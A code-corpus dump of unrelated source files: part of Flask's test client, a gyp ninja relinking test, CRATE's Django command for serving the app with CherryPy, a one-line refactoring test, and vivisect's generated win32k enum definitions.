        self.cookie_jar.inject_wsgi(environ_overrides)
        outer_reqctx = _request_ctx_stack.top
        with app.test_request_context(*args, **kwargs) as c:
            sess = app.open_session(c.request)
            if sess is None:
                raise RuntimeError('Session backend did not open a session. '
                                   'Check the configuration')

            # Since we have to open a new request context for the session
            # handling we want to make sure that we hide out own context
            # from the caller. By pushing the original request context
            # (or None) on top of this and popping it we get exactly that
            # behavior. It's important to not use the push and pop
            # methods of the actual request context object since that would
            # mean that cleanup handlers are called
            _request_ctx_stack.push(outer_reqctx)
            try:
                yield sess
            finally:
                _request_ctx_stack.pop()

            # Persist the (possibly modified) session back into the client's
            # cookie jar by serializing it onto a throwaway response object.
            resp = app.response_class()
            if not app.session_interface.is_null_session(sess):
                app.save_session(sess, resp)
            headers = resp.get_wsgi_headers(c.request.environ)
            self.cookie_jar.extract_wsgi(c.request.environ, headers)

    def open(self, *args, **kwargs):
        # Signal (via the WSGI environ) whether the request context should
        # be preserved after the request ends; see preserve_context above.
        kwargs.setdefault('environ_overrides', {}) \
            ['flask._preserve_context'] = self.preserve_context

        as_tuple = kwargs.pop('as_tuple', False)
        buffered = kwargs.pop('buffered', False)
        follow_redirects = kwargs.pop('follow_redirects', False)
        builder = make_test_environ_builder(self.application, *args, **kwargs)

        return Client.open(self, builder,
                           as_tuple=as_tuple,
                           buffered=buffered,
                           follow_redirects=follow_redirects)

    def __enter__(self):
        if self.preserve_context:
            raise RuntimeError('Cannot nest client invocations')
        self.preserve_context = True
        return self

    def __exit__(self, exc_type, exc_value, tb):
        self.preserve_context = False

        # on exit we want to clean up earlier. Normally the request context
        # stays preserved until the next request in the same thread comes
        # in. See RequestGlobals.push() for the general behavior.
        top = _request_ctx_stack.top
        if top is not None and top.preserved:
            top.pop()
|
matthaywardwebdesign/rethinkdb
|
refs/heads/next
|
external/v8_3.30.33.16/build/gyp/test/ninja/solibs_avoid_relinking/gyptest-solibs-avoid-relinking.py
|
216
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verify that relinking a solib doesn't relink a dependent executable if the
solib's public API hasn't changed.
"""
import os
import sys
import TestCommon
import TestGyp
# NOTE(fischman): This test will not work with other generators because the
# API-hash-based-mtime-preservation optimization is only implemented in
# ninja.py. It could be extended to the make.py generator as well pretty
# easily, probably.
# (also, it tests ninja-specific out paths, which would have to be generalized
# if this was extended to other generators).
test = TestGyp.TestGyp(formats=['ninja'])

test.run_gyp('solibs_avoid_relinking.gyp')

# Build the executable, grab its timestamp, touch the solib's source, rebuild
# executable, ensure timestamp hasn't changed.
test.build('solibs_avoid_relinking.gyp', 'b')
test.built_file_must_exist('b' + TestCommon.exe_suffix)
pre_stat = os.stat(test.built_file_path('b' + TestCommon.exe_suffix))
# Bump solib.cc's mtime so the next build considers the solib dirty and
# relinks it (without changing its public API).
os.utime(os.path.join(test.workdir, 'solib.cc'),
         (pre_stat.st_atime, pre_stat.st_mtime + 100))
test.sleep()
test.build('solibs_avoid_relinking.gyp', 'b')
post_stat = os.stat(test.built_file_path('b' + TestCommon.exe_suffix))

# The executable must NOT have been relinked: its mtime is unchanged.
if pre_stat.st_mtime != post_stat.st_mtime:
    test.fail_test()
else:
    test.pass_test()
|
RudolfCardinal/crate
|
refs/heads/master
|
crate_anon/crateweb/core/management/commands/runcpserver.py
|
1
|
#!/usr/bin/env python
"""
crate_anon/crateweb/core/management/commands/runcpserver.py
===============================================================================
Copyright (C) 2015-2021 Rudolf Cardinal (rudolf@pobox.com).
This file is part of CRATE.
CRATE is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CRATE is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CRATE. If not, see <http://www.gnu.org/licenses/>.
===============================================================================
**Django management command framework for CherryPy.**
- Based on https://lincolnloop.com/blog/2008/mar/25/serving-django-cherrypy/
- Idea and code snippets borrowed from
http://www.xhtml.net/scripts/Django-CherryPy-server-DjangoCerise
- Adapted to run as a management command.
- Some bugs fixed by RNC.
- Then rewritten by RNC.
- Then modified to serve CRATE, with static files, etc.
- Then daemonizing code removed: https://code.djangoproject.com/ticket/4996
TEST COMMAND:
.. code-block:: bash
./manage.py runcpserver --port 8080 --ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem --ssl_private_key /etc/ssl/private/ssl-cert-snakeoil.key
""" # noqa
from argparse import ArgumentParser, Namespace
import logging
from typing import Any
# import errno
# import os
# import signal
# import time
# try:
# import grp
# import pwd
# unix = True
# except ImportError:
# grp = None
# pwd = None
# unix = False
import cherrypy
from django.conf import settings
from django.core.management.base import BaseCommand
from django.utils import translation
from crate_anon.crateweb.config.wsgi import application as wsgi_application
# COULD ALSO USE:
# from django.core.handlers.wsgi import WSGIHandler
# wsgi_application = WSGIHandler()
log = logging.getLogger(__name__)

# Static files are mounted at STATIC_URL minus any trailing slash (CherryPy
# config section keys must not end with '/').
CRATE_STATIC_URL_PATH = settings.STATIC_URL.rstrip('/')
NEED_UNIX = "Need UNIX for group/user operations"
# Default URL root at which the Django app is grafted onto CherryPy.
DEFAULT_ROOT = settings.FORCE_SCRIPT_NAME
class Command(BaseCommand):
    """
    Django management command to run this project in a CherryPy web server.
    """
    help = ("Run this project in a CherryPy webserver. To do this, "
            "CherryPy is required (pip install cherrypy).")

    def add_arguments(self, parser: ArgumentParser) -> None:
        # docstring in superclass
        parser.add_argument(
            '--host', type=str, default="127.0.0.1",
            help="hostname to listen on (default: 127.0.0.1)")
        parser.add_argument(
            '--port', type=int, default=8088,
            help="port to listen on (default: 8088)")
        parser.add_argument(
            "--server_name", type=str, default="localhost",
            help="CherryPy's SERVER_NAME environ entry (default: localhost)")
        # parser.add_argument(
        #     "--daemonize", action="store_true",
        #     help="whether to detach from terminal (default: False)")
        # parser.add_argument(
        #     "--pidfile", type=str,
        #     help="write the spawned process ID to this file")
        # parser.add_argument(
        #     "--workdir", type=str,
        #     help="change to this directory when daemonizing")
        parser.add_argument(
            "--threads", type=int, default=10,
            help="Number of threads for server to use (default: 10)")
        parser.add_argument(
            "--ssl_certificate", type=str,
            help="SSL certificate file "
                 "(e.g. /etc/ssl/certs/ssl-cert-snakeoil.pem)")
        parser.add_argument(
            "--ssl_private_key", type=str,
            help="SSL private key file "
                 "(e.g. /etc/ssl/private/ssl-cert-snakeoil.key)")
        # parser.add_argument(
        #     "--server_user", type=str, default="www-data",
        #     help="user to run daemonized process (default: www-data)")
        # parser.add_argument(
        #     "--server_group", type=str, default="www-data",
        #     help="group to run daemonized process (default: www-data)")
        # --log_screen/--no_log_screen are an on/off pair writing to the same
        # "log_screen" destination; the default (True) is set further down.
        parser.add_argument(
            "--log_screen", dest="log_screen", action="store_true",
            help="log access requests etc. to terminal (default)")
        parser.add_argument(
            "--no_log_screen", dest="log_screen", action="store_false",
            help="don't log access requests etc. to terminal")
        parser.add_argument(
            "--debug_static", action="store_true",
            help="show debug info for static file requests")
        parser.add_argument(
            "--root_path", type=str, default=DEFAULT_ROOT,
            help=f"Root path to serve CRATE at. Default: {DEFAULT_ROOT}")
        parser.set_defaults(log_screen=True)
        # parser.add_argument(
        #     "--stop", action="store_true",
        #     help="stop server")

    def handle(self, *args: str, **options: Any) -> None:
        # docstring in superclass
        opts = Namespace(**options)
        # Activate the current language, because it won't get activated later.
        try:
            translation.activate(settings.LANGUAGE_CODE)
        except AttributeError:
            # LANGUAGE_CODE may be absent from settings; carry on untranslated.
            pass
        # noinspection PyTypeChecker
        runcpserver(opts)
# def change_uid_gid(uid, gid=None):
# """Try to change UID and GID to the provided values.
# UID and GID are given as names like 'nobody' not integer.
#
# Src: http://mail.mems-exchange.org/durusmail/quixote-users/4940/1/
# """
# if not unix:
# raise OSError(NEED_UNIX)
# if not os.geteuid() == 0:
# # Do not try to change the gid/uid if not root.
# return
# (uid, gid) = get_uid_gid(uid, gid)
# os.setgid(gid)
# os.setuid(uid)
# def get_uid_gid(uid, gid=None):
# """Try to change UID and GID to the provided values.
# UID and GID are given as names like 'nobody' not integer.
#
# Src: http://mail.mems-exchange.org/durusmail/quixote-users/4940/1/
# """
# if not unix:
# raise OSError(NEED_UNIX)
# uid, default_grp = pwd.getpwnam(uid)[2:4]
# if gid is None:
# gid = default_grp
# else:
# try:
# gid = grp.getgrnam(gid)[2]
# except KeyError:
# gid = default_grp
# return uid, gid
# def still_alive(pid):
# """
# Poll for process with given pid up to 10 times waiting .25 seconds in
# between each poll.
# Returns False if the process no longer exists otherwise, True.
# """
# for n in range(10):
# time.sleep(0.25)
# try:
# # poll the process state
# os.kill(pid, 0)
# except OSError as e:
# if e[0] == errno.ESRCH:
# # process has died
# return False
# else:
# raise # TODO
# return True
# def stop_server(pidfile):
# """
# Stop process whose pid was written to supplied pidfile.
# First try SIGTERM and if it fails, SIGKILL.
# If process is still running, an exception is raised.
# """
# if os.path.exists(pidfile):
# pid = int(open(pidfile).read())
# try:
# os.kill(pid, signal.SIGTERM)
# except OSError: # process does not exist
# os.remove(pidfile)
# return
# if still_alive(pid):
# # process didn't exit cleanly, make one last effort to kill it
# os.kill(pid, signal.SIGKILL)
# if still_alive(pid):
# raise OSError(f"Process {pid} did not stop.")
# os.remove(pidfile)
class Missing(object):
    """
    CherryPy "application" that is a basic web interface to say "not here".
    """

    # A minimal non-empty config; CherryPy complains if it's empty.
    config = {
        '/': {
            'tools.sessions.on': False,
        }
    }

    @cherrypy.expose
    def index(self) -> str:
        """Serve a plain-text hint for requests outside the mounted app."""
        message = (
            "[CRATE CherryPy server says:] "
            "Nothing to see here. Wrong URL path. "
            "(If you are sure it's right, has the server administrator "
            "set the 'root_path' option correctly?)"
        )
        return message
# noinspection PyUnresolvedReferences
def start_server(host: str,
                 port: int,
                 threads: int,
                 server_name: str,
                 root_path: str,
                 log_screen: bool,
                 ssl_certificate: str,
                 ssl_private_key: str,
                 debug_static: bool) -> None:
    """
    Start CherryPy server.

    Args:
        host: hostname to listen on (e.g. ``127.0.0.1``)
        port: port number to listen on
        threads: number of threads to use in the thread pool
        server_name: CherryPy SERVER_NAME environment variable (e.g.
            ``localhost``)
        root_path: root path to mount server at
        log_screen: show log to console?
        ssl_certificate: optional filename of an SSL certificate
        ssl_private_key: optional filename of an SSL private key
        debug_static: show debug info for static requests?
    """
    # if daemonize and server_user and server_group:
    #     # ensure the that the daemon runs as specified user
    #     change_uid_gid(server_user, server_group)

    cherrypy.config.update({
        'server.socket_host': host,
        'server.socket_port': port,
        'server.thread_pool': threads,
        'server.server_name': server_name,
        'server.log_screen': log_screen,
    })
    # SSL is enabled only when BOTH certificate and private key are supplied.
    if ssl_certificate and ssl_private_key:
        cherrypy.config.update({
            'server.ssl_module': 'builtin',
            'server.ssl_certificate': ssl_certificate,
            'server.ssl_private_key': ssl_private_key,
        })
    log.info(f"Starting on host: {host}")
    log.info(f"Starting on port: {port}")
    log.info(f"Static files will be served from filesystem path: "
             f"{settings.STATIC_ROOT}")
    log.info(f"Static files will be served at URL path: "
             f"{CRATE_STATIC_URL_PATH}")
    log.info(f"CRATE will be at: {root_path}")
    log.info(f"Thread pool size: {threads}")

    static_config = {
        '/': {
            'tools.staticdir.root': settings.STATIC_ROOT,
            'tools.staticdir.debug': debug_static,
        },
        CRATE_STATIC_URL_PATH: {
            'tools.staticdir.on': True,
            'tools.staticdir.dir': '',
        },
    }
    # Mount a "nothing here" app at the server root (it also serves static
    # files), then graft the Django WSGI application at root_path.
    cherrypy.tree.mount(Missing(), '', config=static_config)
    cherrypy.tree.graft(wsgi_application, root_path)

    # noinspection PyBroadException,PyPep8
    try:
        cherrypy.engine.start()
        cherrypy.engine.block()  # blocks until the engine is stopped
    except Exception:
        # 2017-03-13: shouldn't restrict to KeyboardInterrupt!
        cherrypy.engine.stop()
def runcpserver(opts: Namespace) -> None:
    """
    Launch the CherryPy server using arguments from an
    :class:`argparse.Namespace`.

    Args:
        opts: the command-line :class:`argparse.Namespace`
    """
    # (Historical daemonize/stop handling was removed; see
    # https://code.djangoproject.com/ticket/4996.)

    # Start the webserver
    log.info(f'starting server with options {opts}')
    server_kwargs = dict(
        host=opts.host,
        port=opts.port,
        threads=opts.threads,
        server_name=opts.server_name,
        root_path=opts.root_path,
        log_screen=opts.log_screen,
        ssl_certificate=opts.ssl_certificate,
        ssl_private_key=opts.ssl_private_key,
        debug_static=opts.debug_static,
    )
    start_server(**server_kwargs)
def main() -> None:
    """
    Command-line entry point (not typically used directly).
    """
    # Reuse the management command's argument definitions for standalone use.
    parser = ArgumentParser()
    Command().add_arguments(parser)
    runcpserver(parser.parse_args())


if __name__ == '__main__':
    main()
|
vvv1559/intellij-community
|
refs/heads/master
|
python/testData/refactoring/unwrap/whileUnwrap_after.py
|
273
|
x = 1
|
joshuahoman/vivisect
|
refs/heads/master
|
vstruct/defs/windows/win_6_1_i386/win32k.py
|
7
|
# Version: 6.1
# Architecture: i386
# Auto-generated vstruct definitions for win32k (Windows 6.1, x86).
import vstruct
from vstruct.primitives import *

# Flags recorded per-thread by win32k's ETW instrumentation.
ETW_THREAD_FLAG = v_enum()
ETW_THREAD_FLAG.ETW_THREAD_FLAG_HAD_INPUT = 0
ETW_THREAD_FLAG.ETW_THREAD_FLAG_HAD_VISIBLE_WINDOWS = 1
ETW_THREAD_FLAG.ETW_THREAD_FLAG_HAS_NEW_INPUT = 2
ETW_THREAD_FLAG.ETW_THREAD_FLAG_MAX = 3

# Touch-input contact states; -1 marks an invalid/unset contact.
TOUCHSTATE = v_enum()
TOUCHSTATE.TOUCHSTATE_INVALID = -1
TOUCHSTATE.TOUCHSTATE_NONE = 0
TOUCHSTATE.TOUCHSTATE_DOWN = 1
TOUCHSTATE.TOUCHSTATE_MOVE = 2
TOUCHSTATE.TOUCHSTATE_UPOUTOFRANGE = 3
TOUCHSTATE.TOUCHSTATE_INAIR = 4
TOUCHSTATE.TOUCHSTATE_INAIRMOVE = 5
TOUCHSTATE.TOUCHSTATE_INAIROUTOFRANGE = 6
TOUCHSTATE.TOUCHSTATE_COUNT = 7
WHEA_ERROR_SEVERITY = v_enum()
WHEA_ERROR_SEVERITY.WheaErrSevRecoverable = 0
WHEA_ERROR_SEVERITY.WheaErrSevFatal = 1
WHEA_ERROR_SEVERITY.WheaErrSevCorrected = 2
WHEA_ERROR_SEVERITY.WheaErrSevInformational = 3
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED = v_enum()
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_UNINITIALIZED = 0
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_HD15 = 1
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_DVI = 2
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_HDMI = 3
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_HDMI2 = 4
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_SVIDEO_4PIN = 5
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_SVIDEO_7PIN = 6
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_RCA_COMPOSITE = 7
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_RCA_3COMPONENT = 8
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_BNC = 9
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_RF = 10
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_SDTVDONGLE = 11
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_INTERNAL = 12
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_OTHER = 255
SM_STORAGE_MODIFIER = v_enum()
SM_STORAGE_MODIFIER.SmStorageActual = 0
SM_STORAGE_MODIFIER.SmStorageNonActual = 1
DMM_MONITOR_PRESENCE_EVENT_TYPE = v_enum()
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_UNINITIALIZED = 0
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_ADDMONITOR = 1
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_REMOVEMONITOR = 2
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_DRIVERARRIVAL = 3
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_DRIVERQUERYREMOVE = 4
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_DRIVERREMOVECANCELLED = 5
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_DRIVERREMOVECOMPLETE = 6
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_DEVICENODEREADY = 7
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_EDIDCHANGE = 8
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_MONITORDISABLE = 9
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_MONITORENABLE = 10
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_ADAPTERADD = 11
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_ADAPTERREMOVAL = 12
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_INVALIDATION = 13
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_ADDSIMULATEDMONITOR = 1073741825
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_REMOVESIMULATEDMONITOR = 1073741826
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_MAXVALID = 1073741826
REG_NOTIFY_CLASS = v_enum()
REG_NOTIFY_CLASS.RegNtDeleteKey = 0
REG_NOTIFY_CLASS.RegNtPreDeleteKey = 0
REG_NOTIFY_CLASS.RegNtSetValueKey = 1
REG_NOTIFY_CLASS.RegNtPreSetValueKey = 1
REG_NOTIFY_CLASS.RegNtDeleteValueKey = 2
REG_NOTIFY_CLASS.RegNtPreDeleteValueKey = 2
REG_NOTIFY_CLASS.RegNtSetInformationKey = 3
REG_NOTIFY_CLASS.RegNtPreSetInformationKey = 3
REG_NOTIFY_CLASS.RegNtRenameKey = 4
REG_NOTIFY_CLASS.RegNtPreRenameKey = 4
REG_NOTIFY_CLASS.RegNtEnumerateKey = 5
REG_NOTIFY_CLASS.RegNtPreEnumerateKey = 5
REG_NOTIFY_CLASS.RegNtEnumerateValueKey = 6
REG_NOTIFY_CLASS.RegNtPreEnumerateValueKey = 6
REG_NOTIFY_CLASS.RegNtQueryKey = 7
REG_NOTIFY_CLASS.RegNtPreQueryKey = 7
REG_NOTIFY_CLASS.RegNtQueryValueKey = 8
REG_NOTIFY_CLASS.RegNtPreQueryValueKey = 8
REG_NOTIFY_CLASS.RegNtQueryMultipleValueKey = 9
REG_NOTIFY_CLASS.RegNtPreQueryMultipleValueKey = 9
REG_NOTIFY_CLASS.RegNtPreCreateKey = 10
REG_NOTIFY_CLASS.RegNtPostCreateKey = 11
REG_NOTIFY_CLASS.RegNtPreOpenKey = 12
REG_NOTIFY_CLASS.RegNtPostOpenKey = 13
REG_NOTIFY_CLASS.RegNtKeyHandleClose = 14
REG_NOTIFY_CLASS.RegNtPreKeyHandleClose = 14
REG_NOTIFY_CLASS.RegNtPostDeleteKey = 15
REG_NOTIFY_CLASS.RegNtPostSetValueKey = 16
REG_NOTIFY_CLASS.RegNtPostDeleteValueKey = 17
REG_NOTIFY_CLASS.RegNtPostSetInformationKey = 18
REG_NOTIFY_CLASS.RegNtPostRenameKey = 19
REG_NOTIFY_CLASS.RegNtPostEnumerateKey = 20
REG_NOTIFY_CLASS.RegNtPostEnumerateValueKey = 21
REG_NOTIFY_CLASS.RegNtPostQueryKey = 22
REG_NOTIFY_CLASS.RegNtPostQueryValueKey = 23
REG_NOTIFY_CLASS.RegNtPostQueryMultipleValueKey = 24
REG_NOTIFY_CLASS.RegNtPostKeyHandleClose = 25
REG_NOTIFY_CLASS.RegNtPreCreateKeyEx = 26
REG_NOTIFY_CLASS.RegNtPostCreateKeyEx = 27
REG_NOTIFY_CLASS.RegNtPreOpenKeyEx = 28
REG_NOTIFY_CLASS.RegNtPostOpenKeyEx = 29
REG_NOTIFY_CLASS.RegNtPreFlushKey = 30
REG_NOTIFY_CLASS.RegNtPostFlushKey = 31
REG_NOTIFY_CLASS.RegNtPreLoadKey = 32
REG_NOTIFY_CLASS.RegNtPostLoadKey = 33
REG_NOTIFY_CLASS.RegNtPreUnLoadKey = 34
REG_NOTIFY_CLASS.RegNtPostUnLoadKey = 35
REG_NOTIFY_CLASS.RegNtPreQueryKeySecurity = 36
REG_NOTIFY_CLASS.RegNtPostQueryKeySecurity = 37
REG_NOTIFY_CLASS.RegNtPreSetKeySecurity = 38
REG_NOTIFY_CLASS.RegNtPostSetKeySecurity = 39
REG_NOTIFY_CLASS.RegNtCallbackObjectContextCleanup = 40
REG_NOTIFY_CLASS.RegNtPreRestoreKey = 41
REG_NOTIFY_CLASS.RegNtPostRestoreKey = 42
REG_NOTIFY_CLASS.RegNtPreSaveKey = 43
REG_NOTIFY_CLASS.RegNtPostSaveKey = 44
REG_NOTIFY_CLASS.RegNtPreReplaceKey = 45
REG_NOTIFY_CLASS.RegNtPostReplaceKey = 46
REG_NOTIFY_CLASS.MaxRegNtNotifyClass = 47
DEVICE_RELATION_TYPE = v_enum()
DEVICE_RELATION_TYPE.BusRelations = 0
DEVICE_RELATION_TYPE.EjectionRelations = 1
DEVICE_RELATION_TYPE.PowerRelations = 2
DEVICE_RELATION_TYPE.RemovalRelations = 3
DEVICE_RELATION_TYPE.TargetDeviceRelation = 4
DEVICE_RELATION_TYPE.SingleBusRelations = 5
DEVICE_RELATION_TYPE.TransportRelations = 6
D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_TYPE = v_enum()
D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_TYPE.D3DKMDT_VPPMT_UNINITIALIZED = 0
D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_TYPE.D3DKMDT_VPPMT_NOPROTECTION = 1
D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_TYPE.D3DKMDT_VPPMT_MACROVISION_APSTRIGGER = 2
D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_TYPE.D3DKMDT_VPPMT_MACROVISION_FULLSUPPORT = 3
D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_TYPE.D3DKMDT_VPPMT_NOTSPECIFIED = 255
FILE_INFORMATION_CLASS = v_enum()
FILE_INFORMATION_CLASS.FileDirectoryInformation = 1
FILE_INFORMATION_CLASS.FileFullDirectoryInformation = 2
FILE_INFORMATION_CLASS.FileBothDirectoryInformation = 3
FILE_INFORMATION_CLASS.FileBasicInformation = 4
FILE_INFORMATION_CLASS.FileStandardInformation = 5
FILE_INFORMATION_CLASS.FileInternalInformation = 6
FILE_INFORMATION_CLASS.FileEaInformation = 7
FILE_INFORMATION_CLASS.FileAccessInformation = 8
FILE_INFORMATION_CLASS.FileNameInformation = 9
FILE_INFORMATION_CLASS.FileRenameInformation = 10
FILE_INFORMATION_CLASS.FileLinkInformation = 11
FILE_INFORMATION_CLASS.FileNamesInformation = 12
FILE_INFORMATION_CLASS.FileDispositionInformation = 13
FILE_INFORMATION_CLASS.FilePositionInformation = 14
FILE_INFORMATION_CLASS.FileFullEaInformation = 15
FILE_INFORMATION_CLASS.FileModeInformation = 16
FILE_INFORMATION_CLASS.FileAlignmentInformation = 17
FILE_INFORMATION_CLASS.FileAllInformation = 18
FILE_INFORMATION_CLASS.FileAllocationInformation = 19
FILE_INFORMATION_CLASS.FileEndOfFileInformation = 20
FILE_INFORMATION_CLASS.FileAlternateNameInformation = 21
FILE_INFORMATION_CLASS.FileStreamInformation = 22
FILE_INFORMATION_CLASS.FilePipeInformation = 23
FILE_INFORMATION_CLASS.FilePipeLocalInformation = 24
FILE_INFORMATION_CLASS.FilePipeRemoteInformation = 25
FILE_INFORMATION_CLASS.FileMailslotQueryInformation = 26
FILE_INFORMATION_CLASS.FileMailslotSetInformation = 27
FILE_INFORMATION_CLASS.FileCompressionInformation = 28
FILE_INFORMATION_CLASS.FileObjectIdInformation = 29
FILE_INFORMATION_CLASS.FileCompletionInformation = 30
FILE_INFORMATION_CLASS.FileMoveClusterInformation = 31
FILE_INFORMATION_CLASS.FileQuotaInformation = 32
FILE_INFORMATION_CLASS.FileReparsePointInformation = 33
FILE_INFORMATION_CLASS.FileNetworkOpenInformation = 34
FILE_INFORMATION_CLASS.FileAttributeTagInformation = 35
FILE_INFORMATION_CLASS.FileTrackingInformation = 36
FILE_INFORMATION_CLASS.FileIdBothDirectoryInformation = 37
FILE_INFORMATION_CLASS.FileIdFullDirectoryInformation = 38
FILE_INFORMATION_CLASS.FileValidDataLengthInformation = 39
FILE_INFORMATION_CLASS.FileShortNameInformation = 40
FILE_INFORMATION_CLASS.FileIoCompletionNotificationInformation = 41
FILE_INFORMATION_CLASS.FileIoStatusBlockRangeInformation = 42
FILE_INFORMATION_CLASS.FileIoPriorityHintInformation = 43
FILE_INFORMATION_CLASS.FileSfioReserveInformation = 44
FILE_INFORMATION_CLASS.FileSfioVolumeInformation = 45
FILE_INFORMATION_CLASS.FileHardLinkInformation = 46
FILE_INFORMATION_CLASS.FileProcessIdsUsingFileInformation = 47
FILE_INFORMATION_CLASS.FileNormalizedNameInformation = 48
FILE_INFORMATION_CLASS.FileNetworkPhysicalNameInformation = 49
FILE_INFORMATION_CLASS.FileIdGlobalTxDirectoryInformation = 50
FILE_INFORMATION_CLASS.FileIsRemoteDeviceInformation = 51
FILE_INFORMATION_CLASS.FileAttributeCacheInformation = 52
FILE_INFORMATION_CLASS.FileNumaNodeInformation = 53
FILE_INFORMATION_CLASS.FileStandardLinkInformation = 54
FILE_INFORMATION_CLASS.FileRemoteProtocolInformation = 55
FILE_INFORMATION_CLASS.FileMaximumInformation = 56
# ---------------------------------------------------------------------------
# Auto-generated enumeration tables.
#
# Each block below creates a v_enum() namespace object and populates it with
# name -> integer constants.  The names and values appear to mirror Windows
# kernel / WDK enumerations (wdm.h, d3dkmdt.h, dispmprt.h, ...) — presumably
# dumped from debug symbols; verify against the generator before hand-editing.
# Values are ABI-significant: do not renumber, reorder, or "fix" duplicates.
# Several enums intentionally contain aliased members (two names, one value)
# and negative sentinels (e.g. *_FORCE_UINT32 = -1) copied from the headers.
# ---------------------------------------------------------------------------

# Identifier kinds for IRP_MN_QUERY_ID PnP requests.
BUS_QUERY_ID_TYPE = v_enum()
BUS_QUERY_ID_TYPE.BusQueryDeviceID = 0
BUS_QUERY_ID_TYPE.BusQueryHardwareIDs = 1
BUS_QUERY_ID_TYPE.BusQueryCompatibleIDs = 2
BUS_QUERY_ID_TYPE.BusQueryInstanceID = 3
BUS_QUERY_ID_TYPE.BusQueryDeviceSerialNumber = 4
BUS_QUERY_ID_TYPE.BusQueryContainerID = 5
# win32k user-profile section map indices.
PROFILE_MAP = v_enum()
PROFILE_MAP.PMAP_COLORS = 0
PROFILE_MAP.PMAP_CURSORS = 1
PROFILE_MAP.PMAP_WINDOWSM = 2
PROFILE_MAP.PMAP_WINDOWSU = 3
PROFILE_MAP.PMAP_DESKTOP = 4
PROFILE_MAP.PMAP_ICONS = 5
PROFILE_MAP.PMAP_FONTS = 6
PROFILE_MAP.PMAP_TRUETYPE = 7
PROFILE_MAP.PMAP_KBDLAYOUT = 8
PROFILE_MAP.PMAP_INPUT = 9
PROFILE_MAP.PMAP_SUBSYSTEMS = 10
PROFILE_MAP.PMAP_BEEP = 11
PROFILE_MAP.PMAP_MOUSE = 12
PROFILE_MAP.PMAP_KEYBOARD = 13
PROFILE_MAP.PMAP_STICKYKEYS = 14
PROFILE_MAP.PMAP_KEYBOARDRESPONSE = 15
PROFILE_MAP.PMAP_MOUSEKEYS = 16
PROFILE_MAP.PMAP_TOGGLEKEYS = 17
PROFILE_MAP.PMAP_TIMEOUT = 18
PROFILE_MAP.PMAP_SOUNDSENTRY = 19
PROFILE_MAP.PMAP_SHOWSOUNDS = 20
PROFILE_MAP.PMAP_AEDEBUG = 21
PROFILE_MAP.PMAP_NETWORK = 22
PROFILE_MAP.PMAP_METRICS = 23
PROFILE_MAP.PMAP_UKBDLAYOUT = 24
PROFILE_MAP.PMAP_UKBDLAYOUTTOGGLE = 25
PROFILE_MAP.PMAP_WINLOGON = 26
PROFILE_MAP.PMAP_KEYBOARDPREF = 27
PROFILE_MAP.PMAP_SCREENREADER = 28
PROFILE_MAP.PMAP_HIGHCONTRAST = 29
PROFILE_MAP.PMAP_IMECOMPAT = 30
PROFILE_MAP.PMAP_IMM = 31
PROFILE_MAP.PMAP_POOLLIMITS = 32
PROFILE_MAP.PMAP_COMPAT32 = 33
